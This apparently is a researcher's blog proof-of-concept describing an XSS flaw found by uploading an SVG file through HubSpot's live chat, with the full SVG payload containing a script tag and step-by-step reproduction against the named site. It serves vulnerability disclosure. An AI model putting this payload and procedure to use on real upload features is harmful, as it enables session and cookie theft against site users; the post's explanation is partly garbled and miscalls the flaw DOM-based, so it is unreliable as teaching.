Description:
DOM based XSS is a variant of each persistent and reflected XSS. during a DOM based XSS attack, the malicious string isn’t truly parsed by the victim’s browser till the website’s legitimate JavaScript is dead. within the previous samples of persistent and reflected XSS attacks, the server inserts the malicious script into the page, that is then sent during a response to the victim. once the victim’s browser receives the response, it assumes the malicious script to be a part of the page’s legitimate content and mechanically executes it throughout page load like the other script.
In the example of a DOM based XSS attack, however, I selected a domain https://www.hubspot.com/. First of all I visited https://www.hubspot.com/ to find some vulnerabilities. I tried to upload a svg file contains xss payloads and the uploader was in the chat box/live chat which is using the cdn(Content Delivery Network) service of hubspot and the domain is https://cdnp.hubspot.net/. The payloads executed in hubspot cdn through hubspot and this type of vulnerability can be defined as DOM based xss.

We can create a svg file with the following code:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS by Rahad\n'+document.documentURI);
</script>
</svg>

Then save as svg and upload to application then click to visit the page. We can create an alert box with access to Dom enabling cooking theft or other forms of attacks such as serving malicious software.

The steps to reproduce the vulnerability is in the following description.

  • Visit this url https://www.hubspot.com/
  • Open live chat
  • Upload / Attach svg file in live chat box and send
  • click attached file
  • the file will open in a new tab with a popup which is clearly represents a XSS vulnerability in https://cdnp.hubspot.net/

Video POC:

Thanks and Regards
Rahad Chowdhury

One thought on “DOM Based XSS in Hubspot PoC”

Leave a Reply

Your email address will not be published. Required fields are marked *